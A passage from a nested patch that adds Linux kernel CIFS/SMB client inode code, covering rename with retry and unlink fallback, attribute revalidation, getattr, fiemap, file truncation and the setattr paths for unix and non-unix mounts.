++		.disposition = FILE_OPEN,
++		.path = from_path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc == 0) {
++		rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid,
++				(const char *) to_dentry->d_name.name,
++				cifs_sb->local_nls, cifs_remap(cifs_sb));
++		CIFSSMBClose(xid, tcon, fid.netfid);
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++do_rename_exit:
++	if (rc == 0)
++		d_move(from_dentry, to_dentry);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++int
++cifs_rename2(struct user_namespace *mnt_userns, struct inode *source_dir,
++	     struct dentry *source_dentry, struct inode *target_dir,
++	     struct dentry *target_dentry, unsigned int flags)
++{
++	const char *from_name, *to_name;
++	void *page1, *page2;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	unsigned int xid;
++	int rc, tmprc;
++	int retry_count = 0;
++	FILE_UNIX_BASIC_INFO *info_buf_source = NULL;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	FILE_UNIX_BASIC_INFO *info_buf_target;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (flags & ~RENAME_NOREPLACE)
++		return -EINVAL;
++
++	cifs_sb = CIFS_SB(source_dir->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	page1 = alloc_dentry_path();
++	page2 = alloc_dentry_path();
++	xid = get_xid();
++
++	from_name = build_path_from_dentry(source_dentry, page1);
++	if (IS_ERR(from_name)) {
++		rc = PTR_ERR(from_name);
++		goto cifs_rename_exit;
++	}
++
++	to_name = build_path_from_dentry(target_dentry, page2);
++	if (IS_ERR(to_name)) {
++		rc = PTR_ERR(to_name);
++		goto cifs_rename_exit;
++	}
++
++	cifs_close_deferred_file_under_dentry(tcon, from_name);
++	if (d_inode(target_dentry) != NULL)
++		cifs_close_deferred_file_under_dentry(tcon, to_name);
++
++	rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
++			    to_name);
++
++	if (rc == -EACCES) {
++		while (retry_count < 3) {
++			cifs_close_all_deferred_files(tcon);
++			rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
++					    to_name);
++			if (rc != -EACCES)
++				break;
++			retry_count++;
++		}
++	}
++
++	/*
++	 * No-replace is the natural behavior for CIFS, so skip unlink hacks.
++	 */
++	if (flags & RENAME_NOREPLACE)
++		goto cifs_rename_exit;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (rc == -EEXIST && tcon->unix_ext) {
++		/*
++		 * Are src and dst hardlinks of same inode? We can only tell
++		 * with unix extensions enabled.
++		 */
++		info_buf_source =
++			kmalloc_array(2, sizeof(FILE_UNIX_BASIC_INFO),
++					GFP_KERNEL);
++		if (info_buf_source == NULL) {
++			rc = -ENOMEM;
++			goto cifs_rename_exit;
++		}
++
++		info_buf_target = info_buf_source + 1;
++		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, from_name,
++					     info_buf_source,
++					     cifs_sb->local_nls,
++					     cifs_remap(cifs_sb));
++		if (tmprc != 0)
++			goto unlink_target;
++
++		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, to_name,
++					     info_buf_target,
++					     cifs_sb->local_nls,
++					     cifs_remap(cifs_sb));
++
++		if (tmprc == 0 && (info_buf_source->UniqueId ==
++				   info_buf_target->UniqueId)) {
++			/* same file, POSIX says that this is a noop */
++			rc = 0;
++			goto cifs_rename_exit;
++		}
++	}
++	/*
++	 * else ... BB we could add the same check for Windows by
++	 * checking the UniqueId via FILE_INTERNAL_INFO
++	 */
++
++unlink_target:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	/* Try unlinking the target dentry if it's not negative */
++	if (d_really_is_positive(target_dentry) && (rc == -EACCES || rc == -EEXIST)) {
++		if (d_is_dir(target_dentry))
++			tmprc = cifs_rmdir(target_dir, target_dentry);
++		else
++			tmprc = cifs_unlink(target_dir, target_dentry);
++		if (tmprc)
++			goto cifs_rename_exit;
++		rc = cifs_do_rename(xid, source_dentry, from_name,
++				    target_dentry, to_name);
++	}
++
++	/* force revalidate to go get info when needed */
++	CIFS_I(source_dir)->time = CIFS_I(target_dir)->time = 0;
++
++	source_dir->i_ctime = source_dir->i_mtime = target_dir->i_ctime =
++		target_dir->i_mtime = current_time(source_dir);
++
++cifs_rename_exit:
++	kfree(info_buf_source);
++	free_dentry_path(page2);
++	free_dentry_path(page1);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static bool
++cifs_dentry_needs_reval(struct dentry *dentry)
++{
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct cached_fid *cfid = NULL;
++
++	if (cifs_i->time == 0)
++		return true;
++
++	if (CIFS_CACHE_READ(cifs_i))
++		return false;
++
++	if (!lookupCacheEnabled)
++		return true;
++
++	if (!open_cached_dir_by_dentry(tcon, dentry->d_parent, &cfid)) {
++		spin_lock(&cfid->fid_lock);
++		if (cfid->time && cifs_i->time > cfid->time) {
++			spin_unlock(&cfid->fid_lock);
++			close_cached_dir(cfid);
++			return false;
++		}
++		spin_unlock(&cfid->fid_lock);
++		close_cached_dir(cfid);
++	}
++	/*
++	 * depending on inode type, check if attribute caching disabled for
++	 * files or directories
++	 */
++	if (S_ISDIR(inode->i_mode)) {
++		if (!cifs_sb->ctx->acdirmax)
++			return true;
++		if (!time_in_range(jiffies, cifs_i->time,
++				   cifs_i->time + cifs_sb->ctx->acdirmax))
++			return true;
++	} else { /* file */
++		if (!cifs_sb->ctx->acregmax)
++			return true;
++		if (!time_in_range(jiffies, cifs_i->time,
++				   cifs_i->time + cifs_sb->ctx->acregmax))
++			return true;
++	}
++
++	/* hardlinked files w/ noserverino get "special" treatment */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) &&
++	    S_ISREG(inode->i_mode) && inode->i_nlink != 1)
++		return true;
++
++	return false;
++}
++
++/*
++ * Zap the cache. Called when invalid_mapping flag is set.
++ */
++int
++cifs_invalidate_mapping(struct inode *inode)
++{
++	int rc = 0;
++
++	if (inode->i_mapping && inode->i_mapping->nrpages != 0) {
++		rc = invalidate_inode_pages2(inode->i_mapping);
++		if (rc)
++			cifs_dbg(VFS, "%s: Could not invalidate inode %p\n",
++				 __func__, inode);
++	}
++
++	return rc;
++}
++
++/**
++ * cifs_wait_bit_killable - helper for functions that are sleeping on bit locks
++ *
++ * @key:	currently unused
++ * @mode:	the task state to sleep in
++ */
++static int
++cifs_wait_bit_killable(struct wait_bit_key *key, int mode)
++{
++	schedule();
++	if (signal_pending_state(mode, current))
++		return -ERESTARTSYS;
++	return 0;
++}
++
++int
++cifs_revalidate_mapping(struct inode *inode)
++{
++	int rc;
++	unsigned long *flags = &CIFS_I(inode)->flags;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	/* swapfiles are not supposed to be shared */
++	if (IS_SWAPFILE(inode))
++		return 0;
++
++	rc = wait_on_bit_lock_action(flags, CIFS_INO_LOCK, cifs_wait_bit_killable,
++				     TASK_KILLABLE|TASK_FREEZABLE_UNSAFE);
++	if (rc)
++		return rc;
++
++	if (test_and_clear_bit(CIFS_INO_INVALID_MAPPING, flags)) {
++		/* for cache=singleclient, do not invalidate */
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
++			goto skip_invalidate;
++
++		rc = cifs_invalidate_mapping(inode);
++		if (rc)
++			set_bit(CIFS_INO_INVALID_MAPPING, flags);
++	}
++
++skip_invalidate:
++	clear_bit_unlock(CIFS_INO_LOCK, flags);
++	smp_mb__after_atomic();
++	wake_up_bit(flags, CIFS_INO_LOCK);
++
++	return rc;
++}
++
++int
++cifs_zap_mapping(struct inode *inode)
++{
++	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(inode)->flags);
++	return cifs_revalidate_mapping(inode);
++}
++
++int cifs_revalidate_file_attr(struct file *filp)
++{
++	int rc = 0;
++	struct dentry *dentry = file_dentry(filp);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *) filp->private_data;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (!cifs_dentry_needs_reval(dentry))
++		return rc;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tlink_tcon(cfile->tlink)->unix_ext)
++		rc = cifs_get_file_info_unix(filp);
++	else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		rc = cifs_get_file_info(filp);
++
++	return rc;
++}
++
++int cifs_revalidate_dentry_attr(struct dentry *dentry)
++{
++	unsigned int xid;
++	int rc = 0;
++	struct inode *inode = d_inode(dentry);
++	struct super_block *sb = dentry->d_sb;
++	const char *full_path;
++	void *page;
++	int count = 0;
++
++	if (inode == NULL)
++		return -ENOENT;
++
++	if (!cifs_dentry_needs_reval(dentry))
++		return rc;
++
++	xid = get_xid();
++
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	cifs_dbg(FYI, "Update attributes: %s inode 0x%p count %d dentry: 0x%p d_time %ld jiffies %ld\n",
++		 full_path, inode, inode->i_count.counter,
++		 dentry, cifs_get_time(dentry), jiffies);
++
++again:
++	if (cifs_sb_master_tcon(CIFS_SB(sb))->posix_extensions)
++		rc = smb311_posix_get_inode_info(&inode, full_path, sb, xid);
++	else if (cifs_sb_master_tcon(CIFS_SB(sb))->unix_ext)
++		rc = cifs_get_inode_info_unix(&inode, full_path, sb, xid);
++	else
++		rc = cifs_get_inode_info(&inode, full_path, NULL, sb,
++					 xid, NULL);
++	if (rc == -EAGAIN && count++ < 10)
++		goto again;
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++
++	return rc;
++}
++
++int cifs_revalidate_file(struct file *filp)
++{
++	int rc;
++	struct inode *inode = file_inode(filp);
++
++	rc = cifs_revalidate_file_attr(filp);
++	if (rc)
++		return rc;
++
++	return cifs_revalidate_mapping(inode);
++}
++
++/* revalidate a dentry's inode attributes */
++int cifs_revalidate_dentry(struct dentry *dentry)
++{
++	int rc;
++	struct inode *inode = d_inode(dentry);
++
++	rc = cifs_revalidate_dentry_attr(dentry);
++	if (rc)
++		return rc;
++
++	return cifs_revalidate_mapping(inode);
++}
++
++int cifs_getattr(struct user_namespace *mnt_userns, const struct path *path,
++		 struct kstat *stat, u32 request_mask, unsigned int flags)
++{
++	struct dentry *dentry = path->dentry;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(dentry->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct inode *inode = d_inode(dentry);
++	int rc;
++
++	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
++		return -EIO;
++
++	/*
++	 * We need to be sure that all dirty pages are written and the server
++	 * has actual ctime, mtime and file length.
++	 */
++	if ((request_mask & (STATX_CTIME | STATX_MTIME | STATX_SIZE | STATX_BLOCKS)) &&
++	    !CIFS_CACHE_READ(CIFS_I(inode)) &&
++	    inode->i_mapping && inode->i_mapping->nrpages != 0) {
++		rc = filemap_fdatawait(inode->i_mapping);
++		if (rc) {
++			mapping_set_error(inode->i_mapping, rc);
++			return rc;
++		}
++	}
++
++	if ((flags & AT_STATX_SYNC_TYPE) == AT_STATX_FORCE_SYNC)
++		CIFS_I(inode)->time = 0; /* force revalidate */
++
++	/*
++	 * If the caller doesn't require syncing, only sync if
++	 * necessary (e.g. due to earlier truncate or setattr
++	 * invalidating the cached metadata)
++	 */
++	if (((flags & AT_STATX_SYNC_TYPE) != AT_STATX_DONT_SYNC) ||
++	    (CIFS_I(inode)->time == 0)) {
++		rc = cifs_revalidate_dentry_attr(dentry);
++		if (rc)
++			return rc;
++	}
++
++	generic_fillattr(&init_user_ns, inode, stat);
++	stat->blksize = cifs_sb->ctx->bsize;
++	stat->ino = CIFS_I(inode)->uniqueid;
++
++	/* old CIFS Unix Extensions doesn't return create time */
++	if (CIFS_I(inode)->createtime) {
++		stat->result_mask |= STATX_BTIME;
++		stat->btime =
++		      cifs_NTtimeToUnix(cpu_to_le64(CIFS_I(inode)->createtime));
++	}
++
++	stat->attributes_mask |= (STATX_ATTR_COMPRESSED | STATX_ATTR_ENCRYPTED);
++	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_COMPRESSED)
++		stat->attributes |= STATX_ATTR_COMPRESSED;
++	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_ENCRYPTED)
++		stat->attributes |= STATX_ATTR_ENCRYPTED;
++
++	/*
++	 * If on a multiuser mount without unix extensions or cifsacl being
++	 * enabled, and the admin hasn't overridden them, set the ownership
++	 * to the fsuid/fsgid of the current process.
++	 */
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER) &&
++	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
++	    !tcon->unix_ext) {
++		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID))
++			stat->uid = current_fsuid();
++		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID))
++			stat->gid = current_fsgid();
++	}
++	return 0;
++}
++
++int cifs_fiemap(struct inode *inode, struct fiemap_extent_info *fei, u64 start,
++		u64 len)
++{
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_i->netfs.inode.i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifsFileInfo *cfile;
++	int rc;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	/*
++	 * We need to be sure that all dirty pages are written as they
++	 * might fill holes on the server.
++	 */
++	if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
++	    inode->i_mapping->nrpages != 0) {
++		rc = filemap_fdatawait(inode->i_mapping);
++		if (rc) {
++			mapping_set_error(inode->i_mapping, rc);
++			return rc;
++		}
++	}
++
++	cfile = find_readable_file(cifs_i, false);
++	if (cfile == NULL)
++		return -EINVAL;
++
++	if (server->ops->fiemap) {
++		rc = server->ops->fiemap(tcon, cfile, fei, start, len);
++		cifsFileInfo_put(cfile);
++		return rc;
++	}
++
++	cifsFileInfo_put(cfile);
++	return -ENOTSUPP;
++}
++
++int cifs_truncate_page(struct address_space *mapping, loff_t from)
++{
++	pgoff_t index = from >> PAGE_SHIFT;
++	unsigned offset = from & (PAGE_SIZE - 1);
++	struct page *page;
++	int rc = 0;
++
++	page = grab_cache_page(mapping, index);
++	if (!page)
++		return -ENOMEM;
++
++	zero_user_segment(page, offset, PAGE_SIZE);
++	unlock_page(page);
++	put_page(page);
++	return rc;
++}
++
++void cifs_setsize(struct inode *inode, loff_t offset)
++{
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++
++	spin_lock(&inode->i_lock);
++	i_size_write(inode, offset);
++	spin_unlock(&inode->i_lock);
++
++	/* Cached inode must be refreshed on truncate */
++	cifs_i->time = 0;
++	truncate_pagecache(inode, offset);
++}
++
++static int
++cifs_set_file_size(struct inode *inode, struct iattr *attrs,
++		   unsigned int xid, const char *full_path)
++{
++	int rc;
++	struct cifsFileInfo *open_file;
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon = NULL;
++	struct TCP_Server_Info *server;
++
++	/*
++	 * To avoid spurious oplock breaks from server, in the case of
++	 * inodes that we already have open, avoid doing path based
++	 * setting of file size if we can do it by handle.
++	 * This keeps our caching token (oplock) and avoids timeouts
++	 * when the local oplock break takes longer to flush
++	 * writebehind data than the SMB timeout for the SetPathInfo
++	 * request would allow
++	 */
++	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
++	if (open_file) {
++		tcon = tlink_tcon(open_file->tlink);
++		server = tcon->ses->server;
++		if (server->ops->set_file_size)
++			rc = server->ops->set_file_size(xid, tcon, open_file,
++							attrs->ia_size, false);
++		else
++			rc = -ENOSYS;
++		cifsFileInfo_put(open_file);
++		cifs_dbg(FYI, "SetFSize for attrs rc = %d\n", rc);
++	} else
++		rc = -EINVAL;
++
++	if (!rc)
++		goto set_size_out;
++
++	if (tcon == NULL) {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink))
++			return PTR_ERR(tlink);
++		tcon = tlink_tcon(tlink);
++		server = tcon->ses->server;
++	}
++
++	/*
++	 * Set file size by pathname rather than by handle either because no
++	 * valid, writeable file handle for it was found or because there was
++	 * an error setting it by handle.
++	 */
++	if (server->ops->set_path_size)
++		rc = server->ops->set_path_size(xid, tcon, full_path,
++						attrs->ia_size, cifs_sb, false);
++	else
++		rc = -ENOSYS;
++	cifs_dbg(FYI, "SetEOF by path (setattrs) rc = %d\n", rc);
++
++	if (tlink)
++		cifs_put_tlink(tlink);
++
++set_size_out:
++	if (rc == 0) {
++		cifsInode->server_eof = attrs->ia_size;
++		cifs_setsize(inode, attrs->ia_size);
++		/*
++		 * i_blocks is not related to (i_size / i_blksize), but instead
++		 * 512 byte (2**9) size is required for calculating num blocks.
++		 * Until we can query the server for actual allocation size,
++		 * this is best estimate we have for blocks allocated for a file
++		 * Number of blocks must be rounded up so size 1 is not 0 blocks
++		 */
++		inode->i_blocks = (512 - 1 + attrs->ia_size) >> 9;
++
++		/*
++		 * The man page of truncate says if the size changed,
++		 * then the st_ctime and st_mtime fields for the file
++		 * are updated.
++		 */
++		attrs->ia_ctime = attrs->ia_mtime = current_time(inode);
++		attrs->ia_valid |= ATTR_CTIME | ATTR_MTIME;
++
++		cifs_truncate_page(inode->i_mapping, inode->i_size);
++	}
++
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_setattr_unix(struct dentry *direntry, struct iattr *attrs)
++{
++	int rc;
++	unsigned int xid;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct inode *inode = d_inode(direntry);
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	struct cifs_unix_set_info_args *args = NULL;
++	struct cifsFileInfo *open_file;
++
++	cifs_dbg(FYI, "setattr_unix on file %pd attrs->ia_valid=0x%x\n",
++		 direntry, attrs->ia_valid);
++
++	xid = get_xid();
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
++		attrs->ia_valid |= ATTR_FORCE;
++
++	rc = setattr_prepare(&init_user_ns, direntry, attrs);
++	if (rc < 0)
++		goto out;
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	/*
++	 * Attempt to flush data before changing attributes. We need to do
++	 * this for ATTR_SIZE and ATTR_MTIME for sure, and if we change the
++	 * ownership or mode then we may also need to do this. Here, we take
++	 * the safe way out and just do the flush on all setattr requests. If
++	 * the flush returns error, store it to report later and continue.
++	 *
++	 * BB: This should be smarter. Why bother flushing pages that
++	 * will be truncated anyway? Also, should we error out here if
++	 * the flush returns error?
++	 */
++	rc = filemap_write_and_wait(inode->i_mapping);
++	if (is_interrupt_error(rc)) {
++		rc = -ERESTARTSYS;
++		goto out;
++	}
++
++	mapping_set_error(inode->i_mapping, rc);
++	rc = 0;
++
++	if (attrs->ia_valid & ATTR_SIZE) {
++		rc = cifs_set_file_size(inode, attrs, xid, full_path);
++		if (rc != 0)
++			goto out;
++	}
++
++	/* skip mode change if it's just for clearing setuid/setgid */
++	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		attrs->ia_valid &= ~ATTR_MODE;
++
++	args = kmalloc(sizeof(*args), GFP_KERNEL);
++	if (args == NULL) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	/* set up the struct */
++	if (attrs->ia_valid & ATTR_MODE)
++		args->mode = attrs->ia_mode;
++	else
++		args->mode = NO_CHANGE_64;
++
++	if (attrs->ia_valid & ATTR_UID)
++		args->uid = attrs->ia_uid;
++	else
++		args->uid = INVALID_UID; /* no change */
++
++	if (attrs->ia_valid & ATTR_GID)
++		args->gid = attrs->ia_gid;
++	else
++		args->gid = INVALID_GID; /* no change */
++
++	if (attrs->ia_valid & ATTR_ATIME)
++		args->atime = cifs_UnixTimeToNT(attrs->ia_atime);
++	else
++		args->atime = NO_CHANGE_64;
++
++	if (attrs->ia_valid & ATTR_MTIME)
++		args->mtime = cifs_UnixTimeToNT(attrs->ia_mtime);
++	else
++		args->mtime = NO_CHANGE_64;
++
++	if (attrs->ia_valid & ATTR_CTIME)
++		args->ctime = cifs_UnixTimeToNT(attrs->ia_ctime);
++	else
++		args->ctime = NO_CHANGE_64;
++
++	args->device = 0;
++	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
++	if (open_file) {
++		u16 nfid = open_file->fid.netfid;
++		u32 npid = open_file->pid;
++		pTcon = tlink_tcon(open_file->tlink);
++		rc = CIFSSMBUnixSetFileInfo(xid, pTcon, args, nfid, npid);
++		cifsFileInfo_put(open_file);
++	} else {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink)) {
++			rc = PTR_ERR(tlink);
++			goto out;
++		}
++		pTcon = tlink_tcon(tlink);
++		rc = CIFSSMBUnixSetPathInfo(xid, pTcon, full_path, args,
++				    cifs_sb->local_nls,
++				    cifs_remap(cifs_sb));
++		cifs_put_tlink(tlink);
++	}
++
++	if (rc)
++		goto out;
++
++	if ((attrs->ia_valid & ATTR_SIZE) &&
++	    attrs->ia_size != i_size_read(inode)) {
++		truncate_setsize(inode, attrs->ia_size);
++		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
++	}
++
++	setattr_copy(&init_user_ns, inode, attrs);
++	mark_inode_dirty(inode);
++
++	/* force revalidate when any of these times are set since some
++	   of the fs types (eg ext3, fat) do not have fine enough
++	   time granularity to match protocol, and we do not have a
++	   a way (yet) to query the server fs's time granularity (and
++	   whether it rounds times down).
++	*/
++	if (attrs->ia_valid & (ATTR_MTIME | ATTR_CTIME))
++		cifsInode->time = 0;
++out:
++	kfree(args);
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_setattr_nounix(struct dentry *direntry, struct iattr *attrs)
++{
++	unsigned int xid;
++	kuid_t uid = INVALID_UID;
++	kgid_t gid = INVALID_GID;
++	struct inode *inode = d_inode(direntry);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifsFileInfo *wfile;
++	struct cifs_tcon *tcon;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	int rc = -EACCES;
++	__u32 dosattr = 0;
++	__u64 mode = NO_CHANGE_64;
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "setattr on file %pd attrs->ia_valid 0x%x\n",
++		 direntry, attrs->ia_valid);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
++		attrs->ia_valid |= ATTR_FORCE;
++
++	rc = setattr_prepare(&init_user_ns, direntry, attrs);
++	if (rc < 0)
++		goto cifs_setattr_exit;
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto cifs_setattr_exit;
++	}
++
++	/*
++	 * Attempt to flush data before changing attributes. We need to do
++	 * this for ATTR_SIZE and ATTR_MTIME.  If the flush of the data
++	 * returns error, store it to report later and continue.
++	 *
++	 * BB: This should be smarter. Why bother flushing pages that
++	 * will be truncated anyway? Also, should we error out here if
++	 * the flush returns error? Do we need to check for ATTR_MTIME_SET flag?
++	 */
++	if (attrs->ia_valid & (ATTR_MTIME | ATTR_SIZE | ATTR_CTIME)) {
++		rc = filemap_write_and_wait(inode->i_mapping);
++		if (is_interrupt_error(rc)) {
++			rc = -ERESTARTSYS;
++			goto cifs_setattr_exit;
++		}
++		mapping_set_error(inode->i_mapping, rc);
++	}
++
++	rc = 0;
++
++	if ((attrs->ia_valid & ATTR_MTIME) &&
++	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
++		rc = cifs_get_writable_file(cifsInode, FIND_WR_ANY, &wfile);
++		if (!rc) {
++			tcon = tlink_tcon(wfile->tlink);
++			rc = tcon->ses->server->ops->flush(xid, tcon, &wfile->fid);
++			cifsFileInfo_put(wfile);
++			if (rc)
++				goto cifs_setattr_exit;
++		} else if (rc != -EBADF)
++			goto cifs_setattr_exit;
++		else
++			rc = 0;
++	}
++
++	if (attrs->ia_valid & ATTR_SIZE) {
++		rc = cifs_set_file_size(inode, attrs, xid, full_path);
++		if (rc != 0)
++			goto cifs_setattr_exit;
++	}
++
++	if (attrs->ia_valid & ATTR_UID)
++		uid = attrs->ia_uid;
++
++	if (attrs->ia_valid & ATTR_GID)
++		gid = attrs->ia_gid;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
++		if (uid_valid(uid) || gid_valid(gid)) {
++			mode = NO_CHANGE_64;
++			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
++							uid, gid);
++			if (rc) {
++				cifs_dbg(FYI, "%s: Setting id failed with error: %d\n",
++					 __func__, rc);
++				goto cifs_setattr_exit;
++			}
++		}
++	} else
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID))
++		attrs->ia_valid &= ~(ATTR_UID | ATTR_GID);
++
++	/* skip mode change if it's just for clearing setuid/setgid */
++	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		attrs->ia_valid &= ~ATTR_MODE;
++
++	if (attrs->ia_valid & ATTR_MODE) {
++		mode = attrs->ia_mode;
++		rc = 0;
++		if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
++			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
++						INVALID_UID, INVALID_GID);
++			if (rc) {
++				cifs_dbg(FYI, "%s: Setting ACL failed with error: %d\n",
++					 __func__, rc);
++				goto cifs_setattr_exit;
++			}
++
++			/*
++			 * In case of CIFS_MOUNT_CIFS_ACL, we cannot support all modes.
++			 * Pick up the actual mode bits that were set.
++			 */
++			if (mode != attrs->ia_mode)
++				attrs->ia_mode = mode;
++		} else
++		if (((mode & S_IWUGO) == 0) &&
++		    (cifsInode->cifsAttrs & ATTR_READONLY) == 0) {
++
++			dosattr = cifsInode->cifsAttrs | ATTR_READONLY;
++
++			/* fix up mode if we're not using dynperm */
++			if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM) == 0)
++				attrs->ia_mode = inode->i_mode & ~S_IWUGO;
++		} else if ((mode & S_IWUGO) &&
++			   (cifsInode->cifsAttrs & ATTR_READONLY)) {
++
++			dosattr = cifsInode->cifsAttrs & ~ATTR_READONLY;
++			/* Attributes of 0 are ignored */
++			if (dosattr == 0)
++				dosattr |= ATTR_NORMAL;
++
++			/* reset local inode permissions to normal */
++			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
++				attrs->ia_mode &= ~(S_IALLUGO);
++				if (S_ISDIR(inode->i_mode))
++					attrs->ia_mode |=
++						cifs_sb->ctx->dir_mode;
++				else
++					attrs->ia_mode |=
++						cifs_sb->ctx->file_mode;
++			}
++		} else if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
++			/* ignore mode change - ATTR_READONLY hasn't changed */
++			attrs->ia_valid &= ~ATTR_MODE;
++		}
++	}
++
++	if (attrs->ia_valid & (ATTR_MTIME|ATTR_ATIME|ATTR_CTIME) ||
++	    ((attrs->ia_valid & ATTR_MODE) && dosattr)) {
++		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
++		/* BB: check for rc = -EOPNOTSUPP and switch to legacy mode */
++
++		/* Even if error on time set, no sense failing the call if
++		the server would set the time to a reasonable value anyway,
++		and this check ensures that we are not being called from
++		sys_utimes in which case we ought to fail the call back to
++		the user when the server rejects the call */
++		if ((rc) && (attrs->ia_valid &
++				(ATTR_MODE | ATTR_GID | ATTR_UID | ATTR_SIZE)))
++			rc = 0;
++	}
++
++	/* do not need local check to inode_check_ok since the server does
++	   that */
++	if (rc)
++		goto cifs_setattr_exit;
++
++	if ((attrs->ia_valid & ATTR_SIZE) &&
++	    attrs->ia_size != i_size_read(inode)) {
++		truncate_setsize(inode, attrs->ia_size);
++		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
++	}
++
